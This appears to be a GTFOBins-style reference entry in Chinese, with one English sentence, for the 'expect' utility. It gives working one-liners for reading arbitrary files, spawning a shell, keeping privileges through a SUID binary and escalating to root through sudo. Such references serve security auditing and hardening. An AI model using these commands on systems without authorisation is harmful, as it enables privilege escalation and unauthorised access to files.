从文件中读取数据。
expect
command file, the content of the first invalid line is returned in an error message. Thus, this might not be suitable to read arbitrary binary files. LFILE=要读取的文件路径
expect $LFILE
用来生成一个交互式的系统shell。
expect -c 'spawn /bin/sh;interact'
suid是一种授予文件的权限类型,它允许用户使用者以文件所有者的权限来执行文件。
./expect -c 'spawn /bin/sh -p;interact'
如果二进制文件被 sudo 允许以超级用户身份运行,可能被用于访问文件系统、提升或维持特权访问。
sudo expect -c 'spawn /bin/sh;interact'